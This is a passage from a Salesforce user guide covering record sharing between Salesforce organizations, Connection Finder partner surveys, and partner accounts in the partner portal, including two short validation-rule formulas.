When you accept an account, you have the option relate the account to another object and to create a new account, or to use
an existing account. If you create a new account, you can also set the owner of that record.

Accepting Contact Records

When you accept a contact, you have the option relate the contact to another object and to create a new account or contact,
or to use an existing account or contact. If you create a new contact or account, you can also set the owner of that record.

Accepting Case, Lead, and Custom Object Records

When you accept a case, lead or custom object, you have option to relate the case, lead or custom object to another object and
to assign the lead or custom object to a new owner.

Note:  If you choose to Assign using active assignment rule and no assignment rule criteria is met, the
lead, case, or custom object is assigned to the Default Lead, Case, or Custom Object Record Owner.

Accepting Product Records

When you accept a product, you have the option to create a new product or relate the product to an existing product.

Additional Considerations

• After accepting a shared record, if you update a field that your business partner has subscribed to, the field is automatically
updated on the record in your business partner's organization. Likewise, if your business partner updates a field to which
you have subscribed, it is automatically updated in your organization. When your business partner updates the record, the
Last Updated By field will be set to “Connection User”.

• Once you have accepted a record, you can make it available to other connections in the same way you can make any record
available using Salesforce to Salesforce. This allows you to work in a multi-tiered business network. In a multi-tiered
network, changes made to the shared record in any organization updates the information in all the organizations that are
sharing the record.

• When your business partner shares child records at a later time using the Manage Connections link in the related list of
a record you have already accepted, the child records can be automatically added to your organization.

See Also:
Sharing Records Using Salesforce to Salesforce
Connections Home Page
Tips for Using Salesforce to Salesforce
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Automatically Accepting Related Records From a
Connection

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” and “Edit” on the recordTo accept or reject records:

Rules for Automatically Accepting Related Records From a Connection

When you share records using Salesforce to Salesforce, you can also share child records. When you accept a record from a
connection, or when your connection accepts a record from you, the child records can be automatically accepted provided that
certain criteria are met. Similarly, when a child record is shared at a later time using the Manage Connections link in the
related list, and the parent record has already been accepted, the child record can be automatically accepted.

In order for a child record to be accepted automatically, the following criteria must be met:

• The parent record must already be accepted in the organization.
• The record must be related as a child to the parent record.
• The child record cannot have two master records.
• The child record cannot have multiple relationships to the same parent object.
• The connection owner must be an active user.
• The owner of the parent record must be an active user.

Important:  When child records are accepted automatically, there may be a slight delay before they are visible in the
related list of the parent record. Additionally, when a child record is shared using the Manage Connections link in
the related list of a parent record, there may be a slight delay before the Sent Connection Name displays.

If a child record does not meet the criteria for automatic acceptance, it will need to be manually accepted from its object tab.
For example, an opportunity record will need to be accepted from the Opportunities tab. A child record that needs to be
manually accepted will display with the parent record name so that it can be properly assigned. For more information, see
Accepting Records Shared from a Connection on page 1230.

See Also:
Subscribing to Fields in Salesforce to Salesforce

1232

Automatically Accepting Related Records From a ConnectionSharing Salesforce Information with Business Partners



Publishing Objects in Salesforce to Salesforce
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Connections”To publish objects:

The objects you publish are the objects that your users can share with your business partners using Salesforce to Salesforce. If
you have accepted an invitation, created new custom objects, or you have decided to share more information with your business
partner, you may want to publish additional objects. Alternatively, you may find that you want to limit the objects you publish
to a particular business partner.

You can publish the following objects:

• Account

• Attachment

• Case

• Case Comment

• Contact

• Lead

• Opportunity

• Opportunity Product

• Product

• Task

• Custom Object

To define published objects for a connection:

1. Click the Connections tab.
2. Click the name of the connection you want to modify.
3. In the Published Objects related list, click Publish/Unpublish.
4. Select the objects you want to publish to your business partner. Deselect objects you no longer want to publish.
5. Click Save.

Note:

You cannot publish objects that you do not have permission to edit.

When you update your published objects, an email is sent to your business partner notifying them of the change. You can
customize this email by editing the Update Connection communication template.

Your business partner is automatically unsubscribed to objects when you:

• Stop publishing an object

• Delete a custom object to which your business partner is subscribed
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Once you have published an object, you can manage the fields you publish on that object. For more information on publishing
fields, see Publishing Fields in Salesforce to Salesforce on page 1234.

Additional Considerations

• All custom objects in your organization appear in the list of objects, however, Salesforce to Salesforce only supports deployed
custom objects. You cannot forward a record for a custom object that has not been deployed.

• If you publish the case comment object, all public case comments will be shared with your connections. To avoid sharing
a comment on a specific case, select Make Private.

See Also:
Publishing Fields in Salesforce to Salesforce
Forwarding Related Records to a Connection

Publishing Fields in Salesforce to Salesforce
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Connections”To publish fields:

When working with a business partner in Salesforce to Salesforce, you control which objects you share with them by publishing
the objects. In addition, you can control which fields you publish on those objects. By default, the following fields are published:

• Account: Account Name, and, if you are using person accounts, Last Name

• Attachment: Body, Content Type, File Name

• Case: Subject

• Case Comment: Body and Published

• Contact: Last Name

• Custom Object: Name

• Lead: Last Name and Company

• Opportunity: Name, Closed Date, and Stage

• Product: Product Name

• Task: Subject

• Opportunity Product: Quantity, Sales Price

Salesforce to Salesforce displays the API label for each field.

In addition to those required fields, you may want to publish additional fields. Alternatively, you may find that you want to
limit the fields you are currently publishing to a particular business partner.

To define published fields for a connection:

1. Click the Connections tab.
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2. Click the name of the connection you want to modify.
3. In the Published Objects related list, click Edit next to the published object.
4. Select the fields you want to publish to your business partner. Deselect fields you no longer want to publish.
5. Click Save.

Note:  You cannot publish fields that you do not have permission to edit.

Changes to fields may not show up in the subscribing connection for up to 15 minutes while Salesforce refreshes the
cache. This cache enables us to support larger transaction volumes and reduce the number of API calls that count
against your organization's limits.

You cannot publish rich text area (RTA) fields.

When you change which fields you publish, an email is sent to your business partner notifying them of the change. You can
customize this email by editing the Update Connection communication template.

Your business partner is automatically unsubscribed to fields when you:

• Stop publishing a field

• Delete a custom field to which your business partner is subscribed

• Change the type of a field to which your business partner is subscribed

• Change the size or precision of a long text area, text, percent, number, or currency field.

These fields remain published, but your business partner must re-subscribe to them.

Occasionally, new releases of the Salesforce service include new standard fields. Because Salesforce organizations around the
world are not upgraded to new releases simultaneously, you may not be able to publish these new fields to all of your business
partners until their organizations are also upgraded. Service upgrades occur during scheduled system maintenance periods. To
view the system maintenance schedule, go to trust.salesforce.com.

Additional Tips and Considerations

• When publishing fields, consider sending your business partner information about the fields. This helps them to create a
mapping strategy that makes sense for your program.

• Translate your published custom field names into the languages your partners use. This allows them to see the field names
in their own language.

• If you’re using person accounts, and your connection has not enabled person accounts, the person account Last Name is
used as the Account Name when you share a record. If your connection enables person accounts, they are automatically
subscribed to Last Name. Any changes to Last Name and Account Name are synchronized.

See Also:
Managing Connections
Subscribing to Fields in Salesforce to Salesforce
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Making Records Available to a Connection
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” and “Edit” on the recordTo assign records to a connection:

“Read” and “Edit” on the recordTo stop sharing a record:

“Manage Connections”To forward multiple records to a connection:

Salesforce to Salesforce allows you to share records with business partners to whom you are connected. There are two ways to
share records: forward records directly to connections, or assign records to a queue of connections. You can share the same
records with multiple connections. Once shared, connections must choose to accept the records.

Note: Don’t forward a record to the connection that originally shared it. Doing so causes errors when Apex triggers
run.

Sharing a Record with Connections

You can share records with business partners to whom you are connected. You can only forward records that you or your
subordinates own; System Administrators can forward all records.

Note:

Any lead record you are forwarding must include a populated Company Name field.

You cannot forward a record for a custom object that has not been deployed.

1. To forward a record and its related records:

• View the record’s detail page.
• In the External Sharing related list, click the forward button.

2. To forward multiple records to connections:

• Select the tab of the type of record you want to forward.
• Select a list view from the View drop-down list, then click Go!.
• In the list view, select the checkboxes next to the records you want to forward. To select all records, select the checkbox

in the column header.
• Click Forward to Connections.

3. Select the connection(s) to forward the record to in the Available Connections list.

4. Click the Add arrow ( ) to move the connection(s) to the Selected Connections list.
5. Optionally select Send Notification Email (new invitees only) to send email notifying the connection's representative

that you forwarded the record. Only new recipients of the record receive the email; connections that you previously forwarded
the record to don't receive another email.

6. Optionally select the checkboxes next to related records you want to forward. You can also share related records separately.
7. Click Save.
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The records are forwarded to the specified connections.

Note: If you map a currency field, and a record shared by your connection uses a currency that your organization has
not enabled, that currency field will not be updated when your organization auto-accepts the record. For example,
your connection has shared an opportunity with you. Your organization uses the Euro only. Your connection updates
the opportunity and sets the opportunity amount to $300. The opportunity amount will not update in your
organization's record because your organization doesn't support the U.S. Dollar. If you’re manually accepting the
record, the currency is updated only if your organization uses the same currency as the record.

If you publish a currency field and either you or your connection changes the currency on a record containing that
field, updates you make to the field will no longer propagate to the other organization and updates your connection
makes to the field won’t be reflected in your organization.

Sharing Opportunity Products with Connections

An opportunity product is related to both opportunity and product records, and therefore, can only be shared as a child record
of a shared opportunity, provided the associated product is also shared.

If all of the following criteria are met, opportunity products are automatically shared with connections.

• The Opportunity Product object type is published to your connection, and your connection has subscribed to the object.
• The opportunity and the product associated with the opportunity product are shared with your connection.
• In the connection's organization, the opportunity is associated with an active price book during acceptance.
• In the connection's organization, the product is associated with the same active price book as the opportunity.
• In the connection's organization, the product is active.
• In both organizations, the opportunity currency is the same.

When sharing opportunity products, consider the following additional rules:

• If quantity or revenue schedules are enabled in the connection's organization, Quantity and Sales Price fields won’t be
updated in their organization.

• If the price book associated to the opportunity product is changed or deleted in one organization, the opportunity product
will no longer be shared.

• If the opportunity is no longer shared, the opportunity product will no longer be shared.

Sharing Case Comments with Connections

You can share a case comment as a child record of a case. Case comments are automatically accepted by a connection, providing
the following criteria are met:

• The Case Comment object type is published to your connection, and your connection has subscribed to the object.
• The case to which the case comment is associated is shared with the connection.
• The case comment is not marked “Private.”

Sharing Attachments

You can share attachments as child records of any supported object. Attachments are automatically accepted by a connection,
providing the following criteria are met:

• The Attachment object type is published to your connection and your connection is subscribed to the object.
• The parent record for the attachment is shared with the connection.
• The attachment is not marked “Private.”
• The Share With Connections checkbox on the attachment is selected.
• The attachment is 20 MB or less.
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Stop Sharing Records

To stop sharing a record:

Note:  You can only stop sharing records that you or your subordinates own. System Administrators can stop sharing
all records.

1. View the record's detail page.
2. In the External Sharing related list, click Stop Sharing.

When you stop sharing the record with a connection, changes to the record in your organization are not reflected on the record
in the connection's organization. The shared record is not deleted from the other organization.

See Also:
Sharing Records Using Salesforce to Salesforce
External Sharing Related List

External Sharing Related List
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on the recordTo see the external sharing status of a record

“Manage Connections”To stop sharing a record:

Salesforce to Salesforce allows you to share records with one or more connections; each connection has the opportunity to
accept records you share with them, even if other connections have already accepted the same record. When working with a
record that you have received from a connection, or a record that you have shared with a connection, the record detail page
includes a header indicating the record's status. The record may also contain the External Sharing related list, which shows
details on which connections this record is shared with, and the sharing status.

Externally shared records will have one of the following statuses:

Active (sent)

The record has been shared and accepted by an external organization.

Active (received)

The record has been sent to you from an external organization, and it has been accepted.

Pending (sent)

The record has been shared, but not accepted by an external organization.

Inactive

The record is no longer shared with an external organization.
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Inactive (deleted)

The record was accepted by an external organization, but that organization has deleted the record.

Inactive (converted)

The record is a lead that was accepted by an external organization and converted into an opportunity by that organization.
When a lead is converted, Salesforce to Salesforce inactivates the shared record so that it is no longer updated in the
subscribing connection.

Note:  If you change the Lead Status during conversion, it is not reflected in the subscribing connection.

See Also:
Sharing Records Using Salesforce to Salesforce
Making Records Available to a Connection

Forwarding Related Records to a Connection
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” and “Edit” on the recordTo assign records to a connection:

“Read” and “Edit” on the recordTo forward related records to a connection:

“Read” and “Edit” on the recordTo stop sharing a record:

Salesforce to Salesforce allows you to forward records that are children of records already shared with connections. You select
the child record types that can be shared when you share a parent record.

Child records are automatically shared with connections after the parent record has been accepted by the connection, provided
certain criteria are met.

Consider the following tips when sharing related records:

• A related record will no longer be shared with a connection if the related record is edited from an unshared record.

• A maximum of 100 tasks per related record can be shared. This maximum includes open and closed tasks.

To stop sharing a related record from its parent record detail page:

1. Select the parent record's detail page.
2. In the related list of the record you want to stop sharing, click Manage Connections in the Sent Connection Name column.

For example, to stop sharing a contact related to an account, click Manage Connections in the Contacts related list on
the account detail page.

3. Select the connection(s) that you want to stop sharing with in the Selected Connections list.

4. Click the Remove arrow ( ) to move the connection(s) to the Available Connections list.
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5. Click Save.

Alternatively, to stop sharing a related record from its detail page:

1. View the record's detail page.
2. In the External Sharing related list, click Stop Sharing.

To stop sharing a case comment or attachment, you must make the records private.

See Also:
Sharing Records Using Salesforce to Salesforce

Tips for Using Salesforce to Salesforce
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Managing Connections

To track connection activity and other connection details, create a custom report with the Connections with Accounts report
type. The report displays only connections that are associated with accounts.

You can also create custom report types that show connection information for each of your published or subscribed objects.

Managing Records

• If validation rules prevent you from accepting shared records, create a validation rule with the Received Connection
Name field not equal to null; this will ignore validation rules for records you accept from your connections. To create this
rule, use the following formula:

IF(OR(ISNEW(), ISBLANK(Id)), if(ConnectionReceivedId =null, TRUE,
FALSE),NOT(AND(ISCHANGED(ConnectionReceivedId),
NOT(ConnectionReceivedId = null))),
NOT(Contains($User.Alias, "pnet")))

You should also create a similar rule for any Apex trigger that has validation checks.
• To track records that you are sharing with connections, create a custom report. For example, you can create a custom report

that shows all the leads that you have shared with connections that were deleted by the connection:

◊ Use the Leads and Connections report type
◊ Enter the filter criteria “Status equals Inactive (deleted)”

• Make your view of unaccepted records from connections more useful by creating a custom list view. For example, create
a list view that hides unaccepted leads from connections that are more than a month old.

Note:  You must have the “Manage Connections” permission to create these list views.

• Only users with the “Manage Connections” permission can view objects shared from a connection, therefore, you should
create custom list views that you can assign to people who need access to this information.
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• If you are expecting to receive large volumes of records from a connection, enable Auto-Accept for the appropriate objects
on page 1226. For example, if a connection shares a large number of leads with your organization on a regular basis, select
the Auto-Accept checkbox next to Opportunity on the Add or Remove Subscribed Objects page.

• To view records that are shared with multiple connections, create a custom report. Alternatively, to view records shared
with multiple connections in a list view, add the Sent Connection Name field to an existing or new view and verify
that enhanced lists are disabled.

• To see changes made by a connection, enable field tracking on the object and add the history related list to page layouts.
Another option is to create a custom history report that includes the Received Connection Name field.

• To automatically assign all incoming leads or cases to a specific user, create an assignment rule that includes the following
rule entries:

◊ Received Connection Name contains name of connection

◊ Created By contains Connection User

You can do the same with escalation rules.
• If you want to assign a case to a connection using an escalation rule on the case, you must assign the case to a queue where

the connection is a member. For example, if you have a connection that acts as your third-party service agency and all cases
meeting certain criteria should be escalated to this connection, you must:

◊ Create a queue that contains the connection as a member.
◊ Create an escalation rule with the appropriate criteria.
◊ Add an escalation action that automatically assigns cases meeting the specified criteria to that queue

• Use workflow to automate updates to records and connections. Workflow rules will only be triggered for records shared
using Salesforce to Salesforce when:

◊ You accept a parent record.
◊ A child record is inserted.
◊ You are subscribed to the fields that are configured to trigger the workflow rules.

Some suggestions for criteria for workflow rules for Salesforce to Salesforce include:

◊ Received Connection Name field on leads, opportunities, and custom objects.
◊ Current User equals pnet.
◊ Last Modified By field equals Connection User.

For example, you can create a task for a user every time a connection updates a lead:

1. Create a workflow rule with the following criteria:

◊ Evaluation criteria: Evaluate the rule when a record is: created, and every time it’s
edited

◊ Run the rule when criteria are met.
◊ Rule criteria: “Lead: Last Modified By equals Connection User”.

2. Add a workflow task

You can use workflow for many Salesforce to Salesforce processes, including updating values on picklists when a connection
has edited the field. When you accept a record, workflow rules are only triggered by the following fields:

Note:  If your organization is set up to automatically accept records, workflow rules are triggered by any field to
which you subscribed.

Account

◊ Account Name

1241

Tips for Using Salesforce to SalesforceSelling Through Multiple Channels



◊ City
◊ Country
◊ Received Connection Name
◊ Sent Connection Name
◊ State
◊ Type

Case

◊ Case Number
◊ Priority
◊ Status
◊ Subject
◊ Type

Contact

◊ Email
◊ Last Name
◊ Mailing Address
◊ Phone
◊ Title

Lead

◊ Company
◊ Email
◊ Industry
◊ Lead
◊ Lead Source
◊ Name
◊ No. of Employees
◊ Phone
◊ Received Connection Name
◊ Sent Connection Name
◊ State
◊ Status
◊ Title

Opportunity

◊ Account Name
◊ Amount
◊ Close Date
◊ Name
◊ Received Connection Name
◊ Sent Connection Name
◊ Stage
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Custom Object

◊ Connection Name
◊ Name
◊ Sent Date

All subsequent updates made to any fields on accepted records will trigger workflow rules.

Other Tips

• If you want to connect to partners but aren't sure if they use Salesforce, you can use connection finder to find out.
• When you convert a lead, Salesforce to Salesforce inactivates the shared record and updates the External Sharing related

list in your connection's lead record with an Inactive (converted) status. Due to inactivation of the shared record, changes
to the Lead Status during conversion aren't reflected in your connection's lead record.

VERIFYING YOUR BUSINESS PARTNERS USE SALESFORCE

About Connection Finder
Available in: Group, Professional, Enterprise, and Unlimited Editions

If your partners use Salesforce, it is beneficial to connect your Salesforce organizations so that you can share records and
collaborate on relevant business processes. Before you can connect, you need to find out if your partners use Salesforce. Use
Connection Finder to email your partners a link to a simple survey asking if they use Salesforce. Survey responses are recorded
on the contact and account records for each partner. Once you know a partner’s status, you can invite them to connect using
Salesforce to Salesforce.

Setting Up Connection Finder
Available in: Group, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Modify All Data”To enable Connection Finder and edit settings:

Connection Finder allows you to email surveys to find out if your partners are Salesforce customers. Once you know a partner’s
status, you can invite them to connect using Salesforce to Salesforce.

To use connection finder, you must perform the following activities:

1. Enable connection finder in your organization.
2. Configure connection finder settings.

1243

About Connection FinderSharing Salesforce Information with Business Partners



3. Add the Find Connections button to the contacts list view by customizing the search layout. Add the button to the contact
detail page by customizing the contacts page layout.

4. Add the Uses salesforce.com field to the contacts page layout.
5. Add the Salesforce.com Customer field to the account page layout.

Note:

The Uses salesforce.com and Salesforce.com Customer fields also appear on the contact and account
records in any Customer Portal or partner portal you set up.

Enabling Connection Finder

To activate connection finder:

1. From Setup, click Customize > Salesforce to Salesforce > Connection Finder.
2. Click Edit.
3. Select Enabled.
4. Click Save.

The connection finder settings are now available to configure. Additionally, the default email template and required related
fields are created and available for use.

Note:  Disabling connection finder inactivates outstanding surveys and removes the Find Connections button. The
Uses salesforce.com and Salesforce.com Customer fields remain on contact and account records,
respectively.

Configuring Connection Finder Settings

You can determine the content and look of the email you send to partners.

1. From Setup, click Customize > Salesforce to Salesforce > Connection Finder.
2. Click Edit.
3. Select an email template.

The default connection finder template is automatically selected. You can also create custom email templates for your
survey.

Note:  Custom email templates must contain the survey URL. {!Contact.PartnerSurveyURL} is available
as a contact merge field when creating templates.

4. Optionally, select a logo using the lookup.

Note:  You must first upload your logo to the Documents tab and mark it as Externally Available Image.

Salesforce.com recommends adding a branded logo, as it appears at the top of the survey page. If no logo is selected, the
logo portion of the survey page remains blank.

5. Click Save.
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Finding Out if Your Partners Use Salesforce
Available in: Group, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Send Email” (single recipient)

OR

“Mass Email” (multiple recipients)

To email partners asking if they use Salesforce:

If your partners use Salesforce, it is beneficial to connect your Salesforce organizations so that you can share records and
collaborate on relevant business processes. Before you can connect, you need to find out if your partners use Salesforce. Use
Connection Finder to email your partners a link to a simple survey asking if they use Salesforce. Survey responses are recorded
on the contact and account records for each partner. Once you know a partner’s status, you can invite them to connect using
Salesforce to Salesforce.

1. In the Contact list view, select the partners you want to survey and click Find Connections. Alternatively, on a contact
detail page, click Find Connections.

Note: Find Connections doesn’t appear if:

• The contact record doesn’t have a valid email address
• The contact is not associated with an account

If the contact is a person account, Find Connections appears in the list view, but shows an error message if the
user clicks the button. Find Connections does not appear on the contact detail page.

2. Enter a subject for the email.
3. Edit the body text, supplied by the default template, or click Change Template to choose a different email template.

Note:  The default email template is selected by your administrator. You can select a different template or edit
the body text, however, you must include the survey URL: {!Contact.PartnerSurveyURL}.

You cannot edit body text if you chose multiple recipients.

4. Click Check Spelling to spell check the body text.
5. Click Preview to see what your email will look like to the recipient.
6. Click Send.

The email is sent to the selected partners, who have 90 days to respond to the survey before the link becomes invalid. The
partner’s response is recorded in the Uses salesforce.com field on the partner’s contact record and the Salesforce.com
Customer field on the account record. A closed activity is also added for the contact.

Tip: Salesforce.com recommends creating a custom list view or custom report so that you can track customer responses
in one convenient location.
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If the partner’s organization uses Salesforce, the survey displays a section asking if the recipient has administrator privileges
for Salesforce. If not, the recipient can optionally provide their administrator’s contact information and a new contact record
is created in Salesforce for that user, unless one already exists.

Note:  This section doesn’t appear if a contact for that partner, whose Uses salesforce.com value is Yes,
admin user, already exists in your organization.

Tips and Additional Considerations for Connection Finder
Available in: Group, Professional, Enterprise, and Unlimited Editions

• Create a custom list view or custom report to track your survey responses in one location. Add the Uses salesforce.com
field to contact list views and reports. Add the Salesforce.com Customer field to account list views and reports.

• Create translated versions of the default connection finder template to send to international partners. To do so, clone the
default template, make the necessary language changes, and include the survey URL: {!Contact.PartnerSurveyURL}.
You can then choose the appropriate template when sending out requests to your partners.

Note:  The survey page is in English, but includes a Language drop-down so that recipients can view the survey
in their native language.

• When creating validation rules for the Uses salesforce.com field, use the API value, not the label seen in the user
interface. For example:

CONTAINS(TEXT(UseSalesforce ), 'YesNotAdmin')

API valueUses salesforce.com drop-down value

NoNo

NoResponseNo Response

NotSureNot Sure

YesAdminYes, admin user

YesNotAdminYes, not admin user

• If a partner provides details for their Salesforce administrator, Salesforce checks to see if there is already a contact in your
Salesforce organization with that email address. If so, the Uses salesforce.com field on the contact record is set to
Yes, admin user. If the field is already set to No, it is not updated.

Note:  A partner can only add an administrator if one does not already exist as a contact in your organization.

• The Salesforce.com Customer field is dependent upon the values in its contacts' Uses salesforce.com field.
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PARTICIPATING IN SOCIAL NETWORKS FROM WITHIN
SALESFORCE

Salesforce for Twitter and Facebook Overview
Salesforce for Twitter and Facebook gives you an easy way to interact with customers and prospects in real-time on Twitter
and Facebook, directly from within Salesforce.

Available in: Enterprise, Unlimited, and Developer Editions

Salesforce for Twitter and Facebook users can search, monitor, join, and respond to social media conversations that are relevant
to your company, all from within Salesforce. Users can also:

• Find out what people are saying about your company now

• Create cases, contacts, and leads from Tweets and Facebook wall posts and comments

• Share information with Twitter and Facebook communities

• Engage with millions of people sharing opinions, asking questions, and looking for help

You can enable Salesforce for Twitter and Facebook by downloading the free app from the AppExchange. You can find more
documentation from the Resources section of the app listing for Salesforce for Twitter and Facebook.

COLLABORATING WITH PARTNERS TO INCREASE SALES

Partners Overview
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

Partners are the companies with which you collaborate to close your sales deals. For each opportunity or account you create,
the Partners related list allows you to store information about your partners and the roles they play in the opportunity or
account. A partner must be an existing account within Salesforce.

If your organization has been enabled for partners, you can create partner accounts. Partner accounts are business accounts
that a channel manager uses to manage partner organizations, partner users, and activities. They are completely separate from
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account partnerships that are displayed in the Partners related list on an account. For more information about partner portals,
see Partner Portal Overview on page 1251.

Tip:  If your organization uses person accounts, you can use partner roles to relate person accounts to each other. For
example, if you have individual person account records for several members of a household or family, then you can
use partner roles such as “Spouse” or “Sibling” to associate those records.

See Also:
Viewing and Adding Partners

Viewing and Adding Partners
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Edit” on accounts

AND

“Read” on opportunities

To add partners to an account:

“Read” on accounts

AND

“Edit” on opportunities

To add partners to an opportunity:

The opportunity and account detail pages include a Partners related list for viewing and adding partner relationships.

• To view account information for a specific partner, click the partner’s name in the Partners related list.

If you do not have access to view and edit a partner account, the account name appears in the related list but you have no
access to other information about that account.

• Click Del next to a partner to the partner relationship.

Note:

If you change the account for an opportunity that has partners, all partners are deleted from the Partners related
list.

• To add a partner to an opportunity or account:

1. Click New in the Partners related list.
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2. For opportunities only, select the Primary option to indicate the primary partner for the opportunity, if applicable.

An opportunity can have only one primary partner. Setting a new primary partner automatically removes the “Primary”
status from any existing primary partner.

Marking a partner as “Primary” allows you to report on the partner in all of the opportunity reports.

3. In the Partner column, enter the name of an existing account by typing into the box or clicking the lookup icon to
perform an account search. Alternatively, click New from the lookup dialog to create a new account.

4. In the Role column, choose the role that the partner account plays in the current account or opportunity.

Note:

Selecting a partner on an account or opportunity automatically creates a reverse partner relationship so that both
accounts list the other as a partner. The role you select is applied to the partner account; in the current account, the
reverse role is applied.

Your administrator sets the available roles and the corresponding reverse roles when editing the Partner Role
picklist value.

Your administrator has the ability to customize the columns that display in the related list by editing the page layout.
.

See Also:
Partners Overview
Partner Fields
Deleting Partners

Partner Fields
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

A partner has the following fields, listed in alphabetical order.

DescriptionField

Name of partner. You can enter an existing account, or use
the lookup icon to search for (or optionally, create) a new
account.

Partner Name

Option that specifies the primary partner for the opportunity.Primary

Role of partner for a specific opportunity or account. The role
is correlated to the reverse role, applied to the reverse partner

Role
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DescriptionField

relationship. Select from a picklist of available roles, which
are set by an administrator.

See Also:
Partners Overview

Deleting Partners
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Edit” on accountsTo delete partners from an account:

“Edit” on accounts

AND

“Edit” on opportunities

To delete partners from an opportunity:

Removing a partner from an opportunity or account removes the partner's relationship with the opportunity or account, but
does not delete the partner account.

Note:

If you change the account for an opportunity that has partners, all partners are deleted from the Partners related list.

To remove a partner relationship from an opportunity or account, click Del next to the partner’s name.

Removing a partner affects and opportunity or account in the following ways.

Does ThisDeleting a Partner From

Removes the partner from the account and from all
opportunities for that account with which the partner was
associated.

An account
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Does ThisDeleting a Partner From

If the partner is associated with only one opportunity for an
account, the partner is removed from both the opportunity
and the account.

If the partner is associated with multiple opportunities for an
account, the partner is removed from that opportunity only.

An opportunity

The partner remains associated with other opportunities and
with the account.

See Also:
Partners Overview
Viewing and Adding Partners

SHARING INFORMATION WITH PARTNERS

Partner Portal Overview
Available in: Enterprise, Unlimited, and Developer Editions

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Partner relationship management allows companies to maximize the return on their channel investments and increase channel
revenues by managing, tracking, and forecasting channel business alongside their direct sales business. It also helps partners
sell more effectively, close more business, and achieve greater profits.

Empowering your partners with your Salesforce data can help you sell more without spending more. However, you want to
control the information your partners can access, and you want your partners to work within an application that uses your
company's branding. You can accomplish this by granting your partners access to a Salesforce partner portal.

A partner portal allows partner users to log in to Salesforce through a separate website than your non-partner users. Partner
users can only see the data that you have made available to them. Furthermore, partner users can only manipulate data if you
give them the appropriate user permissions.

You can customize the web portal to show your branding, and you can configure it to meet your functional and security needs,
including enabling single sign-on for portals, so your partners have a single log in to access Salesforce. You can also have
multiple portals to meet your different requirements for working with partners.
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Creating Partner Accounts
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view accounts:

“Create” on accountsTo create accounts:

“Manage External Users”To enable a partner account:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Partner accounts are Salesforce accounts that a channel manager uses to manage partner organizations, partner users, and
activities when using the partner portal. Each company with which you partner should be added to Salesforce as a business
account. Channel managers are associated with partner accounts by account ownership. A channel manager who owns a partner
account can access all the information and manage all the activities of the partner account, including that of any partner user
associated with the partner account. This allows the channel manager to easily keep up-to-date on partner activities.

Note: The partner user role is a subordinate of the account owner's role, therefore, all data for the partner user role
rolls up to the partner account owner's role. Keep in mind that if you disable a portal user, their partner user role
becomes obsolete and their data no longer rolls up to the partner account role.

To create a partner account:

1. Create a new business account.
2. Click Manage External Account and then, click Enable as Partner.
3. A confirmation dialog will open. Select Yes, I want to enable this account as a Partner Account..
4. Click Confirm.

Note:  If your organization has person accounts, they cannot be used as partner accounts. Only business accounts can
be used as partner accounts.

Once you have a partner account created, you can add partner users to the account as contact records. Partner users are Salesforce
users with limited capabilities focused on managing leads. Partner users log in to Salesforce through the portal.
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Note:  Partner accounts can’t be deleted, but can be disabled.

See Also:
Disabling Partner Accounts

Disabling Partner Accounts
Disabling a partner account disables external users associated with the account. We recommend disabling a partner account
only if the account was accidentally enabled for portal access.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view accounts:

“Create” on accountsTo create accounts:

“Manage External Users”To enable a partner account:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

You can’t delete partner accounts, but you can disable them. Disabling the account permanently disables up to 15 external
users associated with the account and removes them from all communities, groups, teams, permission sets, and sharing rules
that they’re associated with. Additionally, roles and groups associated with the account are permanently deleted and not moved
to the Recycle Bin.

Note:  You can’t disable an account if there are more than 15 external users associated with it. You must disable the
users before disabling the account.

1. Go to the Account detail page for the account you want to disable.
2. Click Manage External Account, then click either Disable Partner Account.
3. Click OK to confirm.
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If you decide to enable the account in the future, you can re-enable individual contacts as partner portal users. Re-enabling a
contact for a partner portal creates a new partner user and role that is not associated with the previous partner user and role.
You can’t restore deleted roles and groups.

See Also:
Creating Partner Accounts

Working with Partner Users
Available in: Enterprise, Unlimited, and Developer Editions

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

Channel managers are associated with the partner users they manage by partner account ownership. A channel manager who
owns a partner account can access all the information and manage all the activities of the partner users associated with that
account.

